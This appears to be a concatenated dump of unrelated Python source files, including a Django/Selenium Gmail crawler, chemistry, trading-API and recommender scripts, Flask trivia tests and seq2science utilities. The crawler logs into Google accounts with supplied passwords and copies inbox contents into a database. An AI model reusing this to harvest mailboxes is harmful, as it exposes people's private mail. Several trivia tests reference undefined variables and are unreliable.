)\n","sub_path":"purchase_sale_preorders/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152551767","text":"# -*- coding: utf-8 -*-\nimport os\nimport django\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_AML.settings')\ndjango.setup()\nfrom datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom crawler_AML.crawler.gmail import gmail_insert_AML\nfrom AML.models import GmailInfo, GmailList\nimport logging.handlers\nimport time\n\n\nhereWork = str('Gmail')\nnow = datetime.now()\ncurrentTime = '%s_%s_%s' % (now.year, now.month, now.day)\n\n# logger 인스턴스를 생성 및 로그 레벨 설정\nlogger = logging.getLogger(hereWork + '_logging')\nlogger.setLevel(logging.DEBUG)\n\n# formatter 생성\nformatter = logging.Formatter('[%(levelname)s|%(filename)s:%(lineno)s] %(asctime)s > %(message)s')\n\n# fileHandler 와 StreamHandler 를 생성\nfile_max_bytes = 10 * 1024 * 1024 # log file size : 10MB\n\nfileHandler = logging.handlers.RotatingFileHandler(\n 'C://Users/micro/DevelopCode_1905/django_aml/crawler_AML/crawler/log/' + hereWork + '_log_'\n + currentTime, maxBytes=file_max_bytes, backupCount=10)\n\nstreamHandler = logging.StreamHandler()\n\n# handler 에 formatter 세팅\nfileHandler.setFormatter(formatter)\nstreamHandler.setFormatter(formatter)\n\n# Handler 를 logging 에 추가\nlogger.addHandler(fileHandler)\nlogger.addHandler(streamHandler)\n\n# logging\nlogging.debug(hereWork + '_crawler_bot_debugging on' + currentTime)\nlogging.info('info')\nlogging.warning('warning')\nlogging.error('error')\nlogging.critical('critical')\n\n\ndef start(origin_ph, user_id, user_pw):\n options = Options()\n options.add_argument(\"--window-size=1920x1080\")\n options.add_argument(\"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\")\n\n url = 'https://accounts.google.com/signin/v2/identifier?flowName=GlifWebSignIn&flowEntry=ServiceLogin'\n path = r\"C:\\Users\\ten\\Desktop\\django_AML\\crawler_AML\\chromedriver.exe\"\n\n driver = webdriver.Chrome(options=options, executable_path=path)\n driver.get(url)\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".CwaK9\")))\n\n driver.find_element_by_id('identifierId').send_keys(user_id)\n driver.find_element_by_css_selector('.CwaK9').click()\n time.sleep(1)\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".CwaK9\")))\n\n try:\n driver.find_element_by_name('password').send_keys(user_pw)\n except Exception as e:\n error = driver.find_element_by_css_selector('.GQ8Pzc').text\n return error,\n\n driver.find_element_by_css_selector('.CwaK9').click()\n\n try:\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".x7WrMb\")))\n except Exception as e:\n error1 = driver.find_element_by_css_selector('.GQ8Pzc').text\n if error1 != '':\n return error1,\n else:\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#captchaimg\")))\n error2 = driver.find_element_by_css_selector('.T8zd8e').text\n return '보안문제',\n\n start_time_all = time.time()\n\n gmail = gmail_crawler_start(driver, user_id, origin_ph)\n\n 
print('데이터 기반 크롤링 총 구동 시간 :', time.time() - start_time_all)\n return gmail\n\n\ndef gmail_crawler_start(driver, user, origin_ph):\n # 메일\n driver.get('https://mail.google.com/mail/')\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".aeJ\")))\n\n past_date = datetime.now() - timedelta(weeks=13)\n past_date = past_date.strftime('%Y-%m-%d')\n\n gmail_list = list()\n mail_cnt = 0\n while True:\n html = driver.page_source\n html_soup = BeautifulSoup(html, 'html.parser')\n mail_list = html_soup.select('div.BltHke > div.UI tbody > tr')\n mail_cnt += len(mail_list)\n for i in range(len(mail_list)):\n mail_sender = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i+1) + ') > td.yX > div.yW > span.bA4')[0].text\n mail_sender_email = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i+1) + ') > td.yX > div.yW > span.bA4 > span')[0]['email']\n try:\n mail_title = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.xS > div.xT > div.y6')[0].text\n except Exception:\n mail_title = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.a4X > div.xS > div.xT > div.y6')[0].text\n try:\n mail_contents = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.xS > div.xT > span')[0].text\n except Exception:\n mail_contents = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.a4W > div.a4X > div.xS > div.xT > span')[0].text\n mail_date = html_soup.select('div.BltHke > div.UI tbody > tr:nth-of-type('\n + str(i + 1) + ') > td.xW > span')[0]['title'].split(' (')[0]\n\n mail_date = mail_date.replace('년 ', '-').replace('월 ', '-').replace(\"일\", '')\n mail_date = datetime.strptime(mail_date, '%Y-%m-%d')\n mail_date = mail_date.strftime('%Y-%m-%d')\n\n mail_dict = dict()\n if mail_sender != '':\n mail_dict['sender'] = mail_sender\n if mail_sender_email != '':\n mail_dict['mail_sender_email'] = mail_sender_email\n if mail_title != '':\n mail_dict['mail_title'] = mail_title\n if mail_contents != '':\n mail_dict['mail_contents'] = mail_contents\n if mail_date != '':\n mail_dict['mail_date'] = mail_date\n gmail_list.append(mail_dict)\n\n # django db insert\n GmailList(\n user_id=user,\n origin_ph=origin_ph,\n gmail_sender=mail_sender,\n gmail_sender_email=mail_sender_email,\n gmail_title=mail_title,\n gmail_contents=mail_contents,\n gmail_date=mail_date\n ).save()\n\n if mail_date > past_date:\n driver.find_element_by_css_selector('span.Di > div.T-I-Js-Gs').click()\n time.sleep(1.5)\n else:\n break\n # django db insert\n print(gmail_list)\n GmailInfo(\n user_id=user,\n origin_ph=origin_ph,\n mail_cnt=mail_cnt\n ).save()\n\n gmail_dict = dict()\n gmail_dict['user'] = user\n gmail_dict['mail_cnt'] = mail_cnt\n\n driver.close()\n\n return gmail_dict, gmail_list\n","sub_path":"django_aml/crawler_AML/crawler/gmail/gmailCrawlerBot_AML.py","file_name":"gmailCrawlerBot_AML.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"236095446","text":"from ase import atoms\nfrom ase.db import connect\nfrom ase.io import write, read\nfrom ase.calculators.eam import EAM\nfrom ase.dft.dos import DOS\n#from gpaw import GPAW\n\ndb = connect('Al-clusters-initial.db')\ncalc = EAM(potential = 'al_potential.alloy')\n\n#calc = EAM('al_potential.alloy')\n#calc = GPAW(\n#mode ='fd',\n#xc = 'LDA',\n#setups = 
{'Na': '1'},\n#nbands=0,\n#txt='T5.gpaw-out'\n#)\n\nd = ()\ne = ()\nfor cluster in db.select():\n atoms = cluster.toatoms()\n if atoms.get_global_number_of_atoms()<100.0:\n atoms.set_calculator(calc)\n pot_E = atoms.get_potential_energy()\n dos = DOS(calc)\n d = d + (dos.get_dos(),)\n e = e + (dos.get_energies(),)\n","sub_path":"HW5/T5.py","file_name":"T5.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"77383114","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom django.views.generic.base import TemplateView\n\nfrom . import views\n\napp_name = 'schedule'\n\nurlpatterns = [\n\tpath('', views.signup, name='signup'),\n\tpath('login', views.login, name='login'),\n\tpath('logout', auth_views.LogoutView.as_view(), {'next_page': '/login'}, name='logout'),\n\tpath('dashboard', views.dashboard , name='dashboard'),\n\tpath('addSchedule', views.addSchedule, name='addSchedule'),\n\tpath('updateSchedule/', views.updateSchedule, name=\"updateSchedule\"),\n\tpath('deleteSchedule/', views.deleteSchedule, name=\"deleteSchedule\"),\n\tpath('mark//', views.mark, name=\"mark\"),\n\n]\n","sub_path":"todo/schedule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"85016821","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 20 18:42:56 2020\n\n@author: boo\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 20 17:08:36 2020\n\n@author: boo\n\"\"\"\n\nfrom ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nimport threading\nimport time\n\n\nclass TradingApp(EWrapper, EClient): \n def __init__(self):\n EClient.__init__(self,self) \n EWrapper.__init__(self)\n \n \n \n def historicalData(self, reqId, bar):\n print(\"HistoricalData. 
ReqId:\", reqId, \"BarData.\", bar)\n \n \ndef websocket_conn():\n app.run()\n \n \n\napp=TradingApp()\napp.connect(\"127.0.0.1\", 7497, clientId=35) \n\n\ncon_thread=threading.Thread(target=websocket_conn, daemon=True)\ncon_thread.start()\ntime.sleep(1)\n\n\ncontract=Contract()\ncontract.symbol=\"TATAMOTOR\"\ncontract.secType = \"STK\"\ncontract.exchange = \"NSE\" \ncontract.currency = \"INR\" \n\n\napp.reqHistoricalData (reqId=35,\n contract=contract,\n endDateTime='20201118 09:00:00',\n durationStr='3 M',\n barSizeSetting='5 mins',\n whatToShow='MIDPOINT',\n useRTH=0,\n formatDate=1,\n keepUpToDate=0,\n chartOptions=[],)\ntime.sleep(5)\n\n","sub_path":"8_historica.py","file_name":"8_historica.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"137345780","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n\n \"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\"\n\n def test_categories(self):\n res = self.client().get('/categories')\n data = json.loads(new.data)\n self.assertEqual(new.status, 200)\n self.assertEqual(data['SUCCESS'], True)\n self.assertEqual(data['CATEGORIES'])\n\n\n def test_questions(self):\n res = self.client().get('/questions')\n data = json.loads(new.data)\n self.assertEqual(new.status, 200)\n self.assertEqual(data['SUCCESS'], True)\n self.assertEqual(data['CATEGORIES'])\n self.assertEqual(data['QUESTIONS'])\n\n def test_error_questions(self):\n res = self.client().get('/questions?page=10000000')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['SUCCESS'], False)\n self.assertEqual(data['MESSAGE'], 'resource not found')\n\n\n\n def test_delete_question(self):\n id= 2 #id for pass the id to delete the record has same the id\n #code for test DELETE methods that send DELETE reaquset to /example/\n res = self.client().delete('/questions/{}'.format(id))\n data = json.loads(res.data) #featch the delete response\n\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['SUCCESS'], True)\n self.assertEqual(data['MESSAGE'], \"Question successfully deleted\")\n self.assertTrue(data['DELETE_ID'])\n\n\n\n def test_delete_error(self):\n #code for test DELETE methods that send DELETE reaquset to /example/\n res = self.client().delete('/questions/{}'.format(1))\n data = json.loads(res.data) #fetch the delete response\n\n self.assertEqual(res.status_code, 422) #confirm the status response code is 422 is mean unprocessable\n self.assertEqual(data['SUCCESS'], False)\n self.assertEqual(data['MESSAGE'], \"unprocessable\")\n\n\n\n\n def 
test_search_in_questions(self):\n data_json={\n 'searchTerm': 'Which is the only team to play in every soccer World Cup tournament?'\n }\n res = self.client().post('/questions/search', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #fetch the post response\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertIsNotNone(data['QUESTIONS'])\n\n\n def test_get_questions_on_category(self):\n res = self.client().get('/categories/{}/questions'.format(2)) #code for test GET methods that send Get reaquset to /example\n data = json.loads(res.data) #featch the GET response\n\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['success'], True)\n self.assertEqual(data['categories'], 'Art')\n self.assertTrue(data['categories'])\n self.assertTrue(data['totalQuestions'])\n self.assertTrue(data['questions'])\n\n\n def test_get_erorr_questions_on_category(self):\n '''\n Test get question on category with data not exit in db\n :pass\n '''\n res = self.client().get('/categories/{}/questions'.format(10)) #code for test GET methods that send Get reaquset to /example\n data = json.loads(res.data) #featch the GET response\n\n self.assertEqual(res.status_code, 404) #confirm the status response code is 404 is mean resource not found\n self.assertEqual(data['success'], False)\n\n\n def test_get_all_quizzes(self):\n '''\n Test play quizzes on all categores with data in db\n :pass\n '''\n data_json={\n \t\"previous_questions\": [3, 4, 10, 12, 11, 5],\n\t \"quiz_category\": {\"type\": \"click\", \"id\": 0}\n }\n res = self.client().post('/quizzes', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #featch the post response\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['success'], True)\n self.assertIsNotNone(data['question'])\n self.assertNotEqual(data['question']['id'], 3)\n self.assertNotEqual(data['question']['id'], 12)\n\n\n def test_get_quizzes_in_category(self):\n '''\n Test play quizzes on category with data in db\n :pass\n '''\n data_json={\n \t\"previous_questions\": [3, 4, 10, 12, 11, 5],\n\t \"quiz_category\": {\"type\": \"Art\", \"id\": 2}\n }\n res = self.client().post('/quizzes', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #featch the post response\n self.assertEqual(res.status_code, 200) #confirm the status response code is 200 is mean Ok\n self.assertEqual(data['success'], True)\n self.assertIsNotNone(data['question'])\n self.assertNotEqual(data['question']['id'], 3)\n self.assertNotEqual(data['question']['id'], 12)\n\n def test_error_quiz_category_not_found_quizzes(self):\n '''\n Test play quizzes on none (no data) category with data in db\n :pass\n '''\n data_json={\n \t\"previous_questions\": [3, 4, 10, 12, 11, 5],\n\t \"quiz_category\": None\n }\n res = self.client().post('/quizzes', json=data_json) #code for test POST methods that send POST reaquset to /example\n data = json.loads(res.data) #featch the post response\n self.assertEqual(res.status_code, 400) #confirm the status response code is 400 is mean bad request\n self.assertEqual(data['success'], False)\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n 
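# Usage sketch with the standard-library runner: a single case can also be selected from the\n# command line, e.g.  python -m unittest test_flaskr.TriviaTestCase.test_categories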
unittest.main()\n","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152570200","text":"import torch \nimport torch.nn as nn\nfrom torch.autograd import Variable\nclass MFnn(nn.Module):\n def __init__(self, usr_dim, mov_dim, emb_dim):\n super(MFnn, self).__init__()\n self.emb_u = nn.Embedding(usr_dim, emb_dim)\n self.emb_m = nn.Embedding(mov_dim, emb_dim)\n self.dnn_u = nn.Sequential(\n nn.Linear(emb_dim,128),\n nn.BatchNorm1d(128),\n nn.ReLU(),\n nn.Linear(128,256),\n )\n self.dnn_m = nn.Sequential(\n nn.Linear(emb_dim,128),\n nn.BatchNorm1d(128),\n nn.ReLU(),\n nn.Linear(128,256),\n )\n\n self.b_u = nn.Embedding(usr_dim,1)\n self.b_m = nn.Embedding(mov_dim,1)\n \n self.dropout = nn.Dropout(0.1)\n self.activ = nn.Sigmoid()\n\n def forward(self, users, movies):\n embedded_u = self.dnn_u(self.dropout(self.emb_u(users)))\n embedded_m = self.dnn_m(self.dropout(self.emb_m(movies)))\n bias_u = self.b_u(users)\n bias_m = self.b_m(movies)\n \n out = torch.sum(embedded_m * embedded_u, dim=1).view(-1,1) + bias_u + bias_m\n out = self.activ(out)\n return out\n\n\n\n\n\n\n\n\n","sub_path":"hw5/MF_ench/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328542731","text":"\"\"\"\nUtility functions for seq2science\n\"\"\"\nimport contextlib\nimport re\nimport os\nimport sys\nimport glob\nimport time\nimport colorsys\nimport pickle\nimport urllib.request\nimport yaml\nfrom io import StringIO\nfrom typing import List\nfrom math import ceil, floor\n\nfrom filelock import FileLock\nimport genomepy\nimport matplotlib.colors as mcolors\nimport numpy as np\nimport pandas as pd\nimport pysradb\nfrom snakemake.exceptions import TerminatedException\nfrom snakemake.logging import logger\n\n# default colors in matplotlib. 
Order dictates the priority.\nDEFAULT_COLOR_DICTS = [mcolors.BASE_COLORS, mcolors.TABLEAU_COLORS, mcolors.CSS4_COLORS, mcolors.XKCD_COLORS]\n\n\nclass UniqueKeyLoader(yaml.SafeLoader):\n \"\"\"\n YAML loader with duplicate key checking\n source: https://stackoverflow.com/questions/33490870/parsing-yaml-in-python-detect-duplicated-keys\n \"\"\"\n def construct_mapping(self, node, deep=False):\n mapping = []\n for key_node, value_node in node.value:\n key = self.construct_object(key_node, deep=deep).lower()\n if key in mapping:\n logger.error(f\"Duplicate key found in the config.yaml: {key}\\n\")\n raise TerminatedException\n mapping.append(key)\n return super().construct_mapping(node, deep)\n\n\ndef _sample_to_idxs(df: pd.DataFrame, sample: str) -> List[int]:\n \"\"\"\n Get a list of index/indices that belong to a run in a pysradb dataframe\n \"\"\"\n if sample.startswith((\"SRR\", \"DRR\", \"ERR\")):\n idxs = df.index[df.run_accession == sample].tolist()\n assert len(idxs) == 1, f\"sample {sample} with idxs: {idxs}\"\n elif sample.startswith((\"SRX\", \"ERX\", \"DRX\")):\n idxs = df.index[df.experiment_accession == sample].tolist()\n assert len(idxs) >= 1, len(idxs)\n else:\n assert False, f\"sample {sample} not a run, this should not be able to happen!\" \\\n f\" Please make an issue about this!\"\n return idxs\n\n\ndef samples2metadata_local(samples: List[str], config: dict, logger) -> dict:\n \"\"\"\n (try to) get the metadata of local samples\n \"\"\"\n sampledict = dict()\n for sample in samples:\n local_fastqs = glob.glob(os.path.join(config[\"fastq_dir\"], f'{sample}*{config[\"fqsuffix\"]}*.gz'))\n if len(local_fastqs) == 1:\n sampledict[sample] = dict()\n sampledict[sample][\"layout\"] = \"SINGLE\"\n elif len(local_fastqs) == 2 \\\n and any([config[\"fqext1\"] in os.path.basename(f) for f in local_fastqs]) \\\n and any([config[\"fqext2\"] in os.path.basename(f) for f in local_fastqs]):\n sampledict[sample] = dict()\n sampledict[sample][\"layout\"] = \"PAIRED\"\n elif sample.startswith((\"GSM\", \"DRX\", \"ERX\", \"SRX\", \"DRR\", \"ERR\", \"SRR\")):\n continue\n else:\n extend_msg = \"\"\n if len(local_fastqs) > 2:\n extend_msg = (f\"We found too many files matching ({len(local_fastqs)}) \"\n \"and could not distinguish them:\\n\"\n + ', '.join([os.path.basename(f) for f in local_fastqs]) + \".\\n\")\n\n logger.error(f\"\\nsample {sample} was not found..\\n\"\n f\"We checked directory '{config['fastq_dir']}' \"\n f\"for gzipped files starting with '{sample}' and containing '{config['fqsuffix']}'.\\n\"\n + extend_msg +\n f\"Since the sample did not start with either GSM, SRX, SRR, ERR, and DRR we \"\n f\"couldn't find it online..\\n\")\n raise TerminatedException\n\n return sampledict\n\n\ndef samples2metadata_sra(samples: List[str], logger) -> dict:\n \"\"\"\n Get the required info to continue a seq2science run from a list of samples.\n\n - If a sample already exists locally, we only want to know if it is paired-end or single-end.\n - If a sample does not exist locally\n - find its corresponding SRX number and all runs that belong to it,\n - check if they all have the same layout, if not, crash\n - see if we can download the runs from ena\n\n output:\n dict(\n \"GSM1234\": {\"layout\": \"PAIRED\",\n \"runs\": [\"SRR1234\", \"SRR4321\"],\n \"ena_fastq_ftp\": {...},\n\n \"SRR5678\": {\"layout\": \"SINGLE\",\n \"runs\": [\"SRR5678\"],\n ena_fastq_ftp: None,\n ...\n )\n \"\"\"\n # start with empty dictionary which we fill out later\n sampledict = {sample: dict() for sample in 
samples}\n\n # only continue with public samples\n db_sra = pysradb.SRAweb()\n\n # all samples that are on GEO (GSM numbers), must first be converted to SRA ids (SRX numbers)\n geo_samples = [sample for sample in samples if sample.startswith(\"GSM\")]\n\n # in sample2clean we store the (potential GEO) sample name in a SRA compliant name\n if len(geo_samples):\n try:\n df_geo = db_sra.gsm_to_srx(geo_samples)\n except:\n logger.error(\"We had trouble querying the SRA. This probably means that the SRA was unresponsive, and their servers \"\n \"are overloaded or slow. Please try again in a bit...\\n\"\n \"Another possible option is that you try to access samples that do not exist or are protected, and \"\n \"seq2science does not support downloading those..\\n\\n\")\n raise TerminatedException\n\n sample2clean = dict(zip(df_geo.experiment_alias, df_geo.experiment_accession))\n else:\n sample2clean = dict()\n\n # now add the already SRA compliant names with a reference to itself\n sample2clean.update({sample: sample for sample in samples if sample not in geo_samples})\n\n # check our samples on sra\n try:\n df_sra = db_sra.sra_metadata(list(sample2clean.values()), detailed=True)\n except:\n logger.error(\"We had trouble querying the SRA. This probably means that the SRA was unresponsive, and their servers \"\n \"are overloaded or slow. Please try again in a bit...\\n\"\n \"Another possible option is that you try to access samples that do not exist or are protected, and \"\n \"seq2science does not support downloading those..\\n\\n\")\n raise TerminatedException\n\n # keep track of not-supported samples\n not_supported_formats = [\"ABI_SOLID\"]\n not_supported_samples = []\n\n for sample, clean in sample2clean.items():\n # table indices\n idxs = _sample_to_idxs(df_sra, clean)\n\n # get all runs that belong to the sample\n runs = df_sra.loc[idxs].run_accession.tolist()\n assert len(runs) >= 1\n sampledict[sample][\"runs\"] = runs\n\n # check if sample is from a supported format\n for bad_format in not_supported_formats:\n for real_format in df_sra.loc[idxs].instrument_model_desc.tolist():\n if real_format == bad_format:\n not_supported_samples.append(sample)\n\n # get the layout\n layout = df_sra.loc[idxs].library_layout.tolist()\n assert len(set(layout)) == 1, f\"sample {sample} consists of mixed layouts, bad!\"\n assert layout[0] in [\"PAIRED\", \"SINGLE\"], f\"sample {sample} is an unclear layout, bad!\"\n sampledict[sample][\"layout\"] = layout[0]\n\n # get the ena url\n sampledict[sample][\"ena_fastq_ftp\"] = dict()\n for run in runs:\n if layout[0] == \"SINGLE\":\n sampledict[sample][\"ena_fastq_ftp\"][run] = df_sra[df_sra.run_accession == run].ena_fastq_ftp.tolist()\n elif layout[0] == \"PAIRED\":\n sampledict[sample][\"ena_fastq_ftp\"][run] = df_sra[df_sra.run_accession == run].ena_fastq_ftp_1.tolist() + df_sra[\n df_sra.run_accession == run].ena_fastq_ftp_2.tolist()\n\n # if any run from a sample is not found on ENA, better be safe, and assume that sample as a whole is not on ENA\n if any([any(pd.isna(urls)) for urls in sampledict[sample][\"ena_fastq_ftp\"].values()]):\n sampledict[sample][\"ena_fastq_ftp\"] = None\n\n # now report single message for all sample(s) that are from a sequencing platform that is not supported\n assert len(not_supported_samples) == 0, \\\n f'Sample(s) {\", \".join(not_supported_samples)} are not supported by seq2science. 
Samples that are one of ' \\\n        f'these formats; [{\", \".join(not_supported_formats)}] are not supported.'\n\n\n    return sampledict\n\n\ndef samples2metadata(samples: List[str], config: dict, logger) -> dict:\n    local_samples = samples2metadata_local(samples, config, logger)\n    public_samples = [sample for sample in samples if sample not in local_samples.keys()]\n\n    if len(public_samples) == 0:\n        return local_samples\n\n    # chop public samples into smaller chunks, doing large queries results in\n    # pysradb decode errors..\n    chunksize = 100\n    chunked_public = [public_samples[i:i+chunksize] for i in range(0, len(public_samples), chunksize)]\n    sra_samples = dict()\n    for chunk in chunked_public:\n        sra_samples.update(samples2metadata_sra(chunk, logger))\n        # just to be sure sleep in between to not go over our API limit\n        time.sleep(1)\n\n    return {**local_samples, **sra_samples}\n\n\ndef sieve_bam(configdict):\n    \"\"\"\n    helper function to check whether or not we use rule sieve_bam\n    \"\"\"\n    return (\n        configdict.get(\"min_mapping_quality\", 0) > 0\n        or configdict.get(\"tn5_shift\", False)\n        or configdict.get(\"remove_blacklist\", False)\n        or configdict.get(\"filter_on_size\", False)\n        or configdict.get(\"remove_mito\", False)\n    )\n\n\ndef parse_contrast(contrast, samples, check=True):\n    \"\"\"\n    Extract contrast batch and column, target and reference groups from a DE contrast design.\n    Check for contrast validity if check = True.\n\n    If \"all\" is in the contrast groups, it is always assumed to be the target\n    (and expanded to mean all groups in the column in function `get_contrasts()`).\n\n    Accepts a string containing a DESeq2 contrast design.\n\n    Returns\n        batch: the batch column, or None\n        column: the contrast column\n        target: the group of interest\n        reference: the control group\n    \"\"\"\n    # clean contrast\n    de_contrast = contrast.strip().replace(\" \", \"\").replace(\"~\", \"\")\n\n    # parse batch effect\n    batch = None\n    if \"+\" in de_contrast:\n        if de_contrast.count(\"+\") > 1:\n            raise ValueError(f\"DE contrast {contrast} can only contain a '+' to denote the batch effect column.\")\n        batch, de_contrast = de_contrast.split(\"+\")\n\n    # parse groups\n    target, reference = de_contrast.split(\"_\")[-2:]\n\n    # parse column\n    n = de_contrast.find(f\"_{target}_{reference}\")\n    column = de_contrast[:n]\n\n    # \"all\" is never the reference\n    if reference == \"all\":\n        reference = target\n        target = \"all\"\n\n    if check:\n        # check if columns exist and are valid\n        valid_columns = [col for col in samples.columns if col not in [\"sample\", \"assembly\"]]\n        # columns that may have been dropped, if so, these backups have been saved\n        backup_columns = {\"technical_replicates\": \"_trep\", \"biological_replicates\": \"_brep\", \"descriptive_name\": \"_dname\"}\n        for col in [batch, column]:\n            if col:\n                assert col in valid_columns + list(backup_columns.keys()), (\n                    f'\\nIn DESeq2 contrast design \"{contrast}\", '\n                    f'column \"{col}\" does not match any valid column name.\\n'\n                )\n        # check if group is element of column\n        c = column if column in samples else backup_columns[column] # column/backup column\n        all_groups = set(samples[c].dropna().astype(str))\n        for group in [target, reference]:\n            if group != \"all\":\n                assert group in all_groups, (\n                    f'\\nIn DESeq2 contrast design \"{contrast}\", '\n                    f'group {group} cannot be found in column {column}.\\n'\n                )\n\n    return batch, column, target, reference\n\n\ndef expand_contrasts(samples, config):\n    \"\"\"\n    splits contrasts that contain multiple comparisons\n    \"\"\"\n    old_contrasts 
= config.get(\"contrasts\", [])\n if isinstance(old_contrasts, str):\n old_contrasts = [old_contrasts]\n\n new_contrasts = []\n for contrast in old_contrasts:\n batch, column, target, reference = parse_contrast(contrast, samples, check=False)\n\n if target == \"all\":\n # all vs 1 comparison (\"all vs A\")\n targets = set(samples[column].dropna().astype(str))\n targets.remove(reference)\n else:\n # 1 vs 1 comparison (\"A vs B\")\n targets = [target]\n\n for target in targets:\n new_contrast = f\"{column}_{target}_{reference}\"\n if batch:\n new_contrast = f\"{batch}+{new_contrast}\"\n new_contrasts.append(new_contrast)\n\n # get unique elements\n new_contrasts = list(set(new_contrasts))\n return new_contrasts\n\n\ndef url_is_alive(url):\n \"\"\"\n Checks that a given URL is reachable.\n https://gist.github.com/dehowell/884204\n \"\"\"\n for i in range(3):\n try:\n request = urllib.request.Request(url)\n request.get_method = lambda: 'HEAD'\n\n urllib.request.urlopen(request, timeout=5)\n return True\n except:\n continue\n return False\n\n \ndef get_bustools_rid(params):\n \"\"\"\n Extract the position of the fastq containig reads from the bustools -x argument.\n The read_id is the first pos of the last triplet in the bc:umi:read string or hard-coded\n for short-hand syntax.\n In: -x 10xv3 -> read_id=1 \n In: -x 0,0,16:0,16,26:1,0,0 -> read_id=1\n \"\"\"\n kb_tech_dict = {'10xv2': 1, '10xv3': 1, 'celseq': 1, 'celseq2': 1,\n 'dropseq': 1, 'scrubseq': 1, 'indropsv1': 1, 'indropsv2': 0 } \n #Check for occurence of short-hand tech\n bus_regex = \"(? tuple:\n \"\"\"\n convert a string with RGB/matplotlib named colors to matplotlib HSV tuples.\n\n supports RGB colors with ranges between 0-1 or 0-255.\n\n supported matplotlib colors can be found here:\n https://matplotlib.org/3.3.1/gallery/color/named_colors.html\n \"\"\"\n # input: RGB\n if color.count(\",\") == 2:\n value = [float(c) for c in color.split(\",\")]\n return rgb_to_hsv(value)\n\n # input: matplotlib colors\n cdicts = color_dicts if color_dicts else DEFAULT_COLOR_DICTS\n for cdict in cdicts:\n if color in cdict:\n value = cdict[color]\n\n # tableau, css4 and xkcd return hex colors.\n if str(value).startswith(\"#\"):\n value = hex_to_rgb(value)\n\n return rgb_to_hsv(value)\n\n logger.error(f\"Color not recognized: {color}\")\n raise ValueError\n\n\ndef color_picker(n, min_h=0, max_h=0.85, s=1.00, v=0.75, alternate=True):\n \"\"\"\n Return a list of n tuples with HSV colors varying only in hue.\n \"Alternate\" determines whether hues transition gradually or discretely.\n \"\"\"\n # for fewer samples, select nearby colors\n steps = max(n, 8)\n\n hues = np.linspace(min_h, max_h, steps).tolist()[0:n]\n if alternate:\n m = ceil(len(hues)/2)\n h1 